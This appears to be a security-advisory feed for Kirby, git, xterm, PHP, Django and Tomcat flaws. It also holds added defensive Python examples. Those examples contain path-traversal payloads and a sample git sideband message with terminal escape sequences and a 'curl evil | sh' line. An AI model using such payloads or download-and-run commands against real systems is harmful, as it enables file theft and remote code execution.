Github Security Blog, added 2025/05/13 8:2 p.m.

Kirby vulnerable to path traversal of snippet names in the `snippet()` helper

TL;DR This vulnerability affects all Kirby sites that use the snippet() helper or $kirby->snippet() method with a dynamic snippet name (such as a snippet name that depends on request or user data). Sites that only use fixed calls to the snippet() helper/$kirby->snippet() method, i.e. calls with a simple strin...

CVSS 9.1 | AI score 6.6 | EPSS 0.00577
Exploits 1 | References 7 | Affected software 1
OSV, added 2025/05/13 8:2 p.m.

GHSA-X275-H9J4-7P4H Kirby vulnerable to path traversal of collection names during file system lookup

TL;DR This vulnerability affects all Kirby sites that use the collection() helper or $kirby->collection() method with a dynamic collection name (such as a collection name that depends on request or user data). Sites that only use fixed calls to the collection() helper/$kirby->collection() method, i.e. calls...

CVSS 6.3 | AI score 6.6 | EPSS 0.00477
Exploits 0 | References 7
Github Security Blog, added 2025/05/13 8:2 p.m.

Kirby vulnerable to path traversal of collection names during file system lookup

TL;DR This vulnerability affects all Kirby sites that use the collection() helper or $kirby->collection() method with a dynamic collection name (such as a collection name that depends on request or user data). Sites that only use fixed calls to the collection() helper/$kirby->collection() method, i.e. calls...

CVSS 9.1 | AI score 6.6 | EPSS 0.00477
Exploits 0 | References 7 | Affected software 1
RedHat Linux, added 2025/05/13 4:5 p.m.

git: The sideband payload is passed unfiltered to the terminal in git

A flaw was found in Git. When cloning, fetching, or pushing from a server, informational or error messages are transported from the remote Git process to the client via a sideband channel. These messages are prefixed with "remote:" and printed directly to the standard error output. Typically, thi...

CVSS 8.8 | AI score 7.3 | EPSS 0.00494
Exploits 1 | References 6
Snyk, added 2025/05/13 3:44 p.m.

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal due to the improper handling of dynamic collection names in the collection() helper or $kirby->collection() method. An attacker can execute arbitrary PHP code and access sensitive files on the server by manipulating the...

CVSS 9.1 | AI score 8 | EPSS 0.00477
Exploits 0 | References 2
Snyk, added 2025/05/13 3:42 p.m.

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal via the snippet() helper or $kirby->snippet() method with a dynamic snippet name. An attacker can access arbitrary files by manipulating the snippet path to traverse to directories outside of the intended snippet's root...

CVSS 9.1 | AI score 7.7 | EPSS 0.00577
Exploits 1 | References 2
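The Kirby snippet() and collection() entries above all describe the same pattern: a name taken from request or user data is turned into a file path under a fixed directory, and nothing stops `../` segments or an absolute path from leaving that directory. The example below is added here and is not Kirby's code; it models the lookup with a hypothetical `lookup_unsafe`/`lookup_safe` pair, an assumed site-specific `ALLOWED_NAMES` allowlist, and a throwaway site layout built by `build_site()` in a temp directory (all constructed for the demonstration). The hardened version applies two independent checks: an exact allowlist, and a containment check on the resolved path, so that a string-level filter for `..` is never the only line of defence.

```python
"""Added example, not Kirby's code: the lookup pattern behind the snippet()
and collection() advisories, beside a hardened version. lookup_unsafe,
lookup_safe, ALLOWED_NAMES and the layout built by build_site() are all
assumptions made for this demonstration."""
import os
import tempfile
from pathlib import Path

# Assumed site-specific allowlist: every snippet a template may legitimately
# request by a user-derived name. Anything else is rejected before any
# filesystem access happens.
ALLOWED_NAMES = {"header", "footer", "cards/teaser"}


def lookup_unsafe(root: Path, name: str) -> Path:
    """The vulnerable pattern: join a user-controlled name onto the snippet root
    with no check. '../' segments walk out of the directory, and an absolute
    name makes os.path.join discard the root entirely."""
    return Path(os.path.join(str(root), name + ".php"))


def is_inside(root: Path, candidate: Path) -> bool:
    """True if candidate resolves to root itself or somewhere below it.
    resolve() canonicalises '..' and symlinks on both sides, so this is not
    fooled by a sibling directory such as 'snippets-evil' next to 'snippets'."""
    root = root.resolve()
    candidate = candidate.resolve()
    return candidate == root or root in candidate.parents


def lookup_safe(root: Path, name: str) -> Path:
    """Hardened lookup: allowlist first (cheap and exact), then an independent
    containment check so a future allowlist mistake still cannot escape root."""
    if name not in ALLOWED_NAMES:
        raise ValueError(f"snippet name not allowed: {name!r}")
    candidate = root / (name + ".php")
    if not is_inside(root, candidate):
        raise ValueError(f"snippet path escapes root: {candidate}")
    return candidate.resolve()


def build_site() -> tuple:
    """Constructed layout in a temp dir: site/snippets/ as the snippet root and
    a config file outside it, standing in for data a traversal would expose."""
    base = Path(tempfile.mkdtemp())
    root = base / "site" / "snippets"
    (root / "cards").mkdir(parents=True)
    (root / "header.php").write_text("<header>site</header>")
    (root / "cards" / "teaser.php").write_text("<article>teaser</article>")
    secret = base / "site" / "config" / "config.php"
    secret.parent.mkdir(parents=True)
    secret.write_text("<?php return ['db' => ['password' => 'constructed-secret']];")
    return root, secret


def demo() -> dict:
    """Run a relative traversal and an absolute-path payload through both lookups."""
    root, secret = build_site()
    # Constructed attacker inputs: '../' traversal and an absolute path.
    payloads = ["../config/config", str(secret.with_suffix(""))]
    results = {"unsafe_reads_outside": [], "safe_blocked": []}
    for payload in payloads:
        leaked = lookup_unsafe(root, payload)
        results["unsafe_reads_outside"].append(leaked.read_text() == secret.read_text())
        try:
            lookup_safe(root, payload)
            results["safe_blocked"].append(False)
        except ValueError:
            results["safe_blocked"].append(True)
    results["safe_allows_valid"] = lookup_safe(root, "cards/teaser").read_text()
    return results


if __name__ == "__main__":
    print(demo())
```

The containment check alone would already stop both payloads here, but it depends on `resolve()` behaving correctly for every path shape the application might see; the allowlist is what turns "any file under snippets/" into "exactly these snippets", which is the smaller surface a request-derived name should ever have.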
Snyk, added 2025/05/13 3:42 p.m.

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal via a missing check in the router implementation. An attacker can navigate and determine the existence of files on the server using special elements such as .. and / separators. Details A Directory Traversal attack...

CVSS 7.5 | AI score 7.6 | EPSS 0.00475
Exploits 0 | References 2
RedHat Linux, added 2025/05/13 2:0 p.m.

php: Single byte overread with convert.quoted-printable-decode filter

A memory-related vulnerability was found in PHP’s filter handling system, particularly when processing input with convert.quoted-printable-decode filters. This issue can lead to a segmentation fault. This vulnerability is triggered through specific sequences of input data, causing PHP to crash...

CVSS 8.2 | AI score 5.8 | EPSS 0.01618
Exploits 1 | References 5
RedHat Linux, added 2025/05/13 1:58 p.m.

xterm: code execution via OSC 50 input sequences

A flaw was found in xterm. This issue may allow code execution via font ops...

CVSS 9.8 | AI score 6.1 | EPSS 0.04949
Exploits 1 | References 4
RedHat Linux, added 2025/05/13 1:58 p.m.

Low: Red Hat Security Advisory: xterm security update

An update for xterm is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE...

CVSS 9.8 | AI score 7.6 | EPSS 0.04949
Exploits 1 | References 2
RedHat Linux, added 2025/05/13 1:55 p.m.

git: The sideband payload is passed unfiltered to the terminal in git

A flaw was found in Git. When cloning, fetching, or pushing from a server, informational or error messages are transported from the remote Git process to the client via a sideband channel. These messages are prefixed with "remote:" and printed directly to the standard error output. Typically, thi...

CVSS 8.8 | AI score 7.3 | EPSS 0.00494
Exploits 1 | References 6
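Both git entries above describe the same mechanism: text received over the sideband channel from a remote is written to the local stderr as-is, so a hostile server can embed terminal escape sequences (cursor movement, line erasure, OSC title or clipboard sequences, BEL) in what looks like a harmless "remote:" message. The block below is an added example, not git's code, and the function names (`render_sideband`, `escape_controls`, `contains_controls`) and the `SAMPLE` payload are constructed here; it shows the client-side policy a practitioner would want, which is to render every control character other than tab visibly as `\xNN` and to split lines on both `\n` and bare `\r`, since progress output uses `\r` to redraw a line.

```python
"""Added example, not git's code: render sideband text from a remote without
letting it control the local terminal. All names here are constructed for
the demonstration."""
import re

# Control characters a terminal interprets: C0 (except \t), DEL and the C1
# range U+0080..U+009F. \n and \r are handled separately as line breaks.
_CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")


def escape_controls(text: str) -> str:
    """Replace each control character with a visible \\xNN escape so an
    ESC ] ... BEL or CSI sequence is shown to the user instead of executed."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group(0)), text)


def contains_controls(payload: bytes) -> bool:
    """Detection helper: True if the raw sideband payload carries anything a
    terminal would interpret (useful for logging or alerting on a remote)."""
    text = payload.decode("utf-8", errors="backslashreplace")
    return _CONTROL.search(text) is not None


def render_sideband(payload: bytes, prefix: str = "remote: ") -> str:
    """Decode the payload, split it into lines on \\n and bare \\r, and prefix
    each line after escaping control characters. Decoding with
    backslashreplace keeps invalid bytes from ever becoming raw C1 controls."""
    text = payload.decode("utf-8", errors="backslashreplace")
    lines = re.split(r"\r\n|\r|\n", text)
    if lines and lines[-1] == "":
        lines.pop()  # trailing newline, not an extra empty message
    return "".join(prefix + escape_controls(line) + "\n" for line in lines)


# Constructed hostile payload: normal progress output, then an OSC title
# change, erase-line and cursor-up sequences meant to hide or overwrite
# what the user sees before a fake instruction.
SAMPLE = (
    b"Enumerating objects: 5, done.\rCounting objects: 100% (5/5), done.\n"
    b"\x1b]0;pwned\x07\x1b[2K\x1b[1Aerror: repository moved, run: curl evil | sh\n"
)


if __name__ == "__main__":
    print("controls present:", contains_controls(SAMPLE))
    print(render_sideband(SAMPLE), end="")
```

The filter is deliberately indiscriminate: a client cannot tell a "benign" colour code from a sequence that rewrites the screen, and the only state it can reason about is whether the bytes came from the remote at all. Rendering them visibly costs nothing for legitimate servers, whose messages are plain text.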
RedHat Linux, added 2025/05/13 8:42 a.m.

php: Single byte overread with convert.quoted-printable-decode filter

A memory-related vulnerability was found in PHP’s filter handling system, particularly when processing input with convert.quoted-printable-decode filters. This issue can lead to a segmentation fault. This vulnerability is triggered through specific sequences of input data, causing PHP to crash...

CVSS 8.2 | AI score 5.8 | EPSS 0.01618
Exploits 1 | References 5
RedHat Linux, added 2025/05/13 8:28 a.m.

kernel: bpf: Fix too early release of tcx_entry

A flaw was found in the Linux kernel in which certain sequences of network namespace activity can cause a use-after-free, resulting in a denial of service...

CVSS 5.5 | AI score 7.2 | EPSS 0.00353
Exploits 0 | References 4
OpenVAS, added 2025/05/13 12:0 a.m.

Huawei EulerOS: Security Advisory for git (EulerOS-SA-2025-1513)

The remote host is missing an update for the Huawei EulerOS...

CVSS 8.8 | AI score 8.5 | EPSS 0.00494
Exploits 1 | References 2
Tenable Nessus, added 2025/05/13 12:0 a.m.

Python Library Django 4.2.x < 4.2.21 / 5.1.x < 5.1.9 / 5.2.x < 5.2.1 DoS

The detected version of the Django Python package, Django, is 4.2.x prior to 4.2.21 or 5.1.x prior to 5.1.9 or 5.2.x prior to 5.2.1. It is, therefore, affected by a denial of service vulnerability as disclosed in Django's May 7th 2025 security advisory. The django.utils.html.striptags function is...

CVSS 5.3 | AI score 6.6 | EPSS 0.13969
Exploits 0 | References 2
OSV, added 2025/05/13 12:0 a.m.

ALSA-2025:7427 Low: xterm security update

The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. Security Fixes: xterm: code execution via OSC 50 input sequences (CVE-2022-45063). For more details about the securi...

CVSS 9.8 | AI score 7.2 | EPSS 0.04949
Exploits 1 | References 4
Amazon, added 2025/05/13 12:0 a.m.

Important: tomcat9

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

CVSS 9.8 | AI score 7.3 | EPSS 0.66933
Exploits 6
Amazon, added 2025/05/13 12:0 a.m.

Important: tomcat9

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

CVSS 9.8 | AI score 9.4 | EPSS 0.66933
Exploits 6
Amazon, added 2025/05/13 12:0 a.m.

Important: tomcat10

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

CVSS 9.8 | AI score 7.3 | EPSS 0.66933
Exploits 6
Amazon, added 2025/05/13 12:0 a.m.

Important: tomcat10

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

CVSS 9.8 | AI score 9.4 | EPSS 0.66933
Exploits 6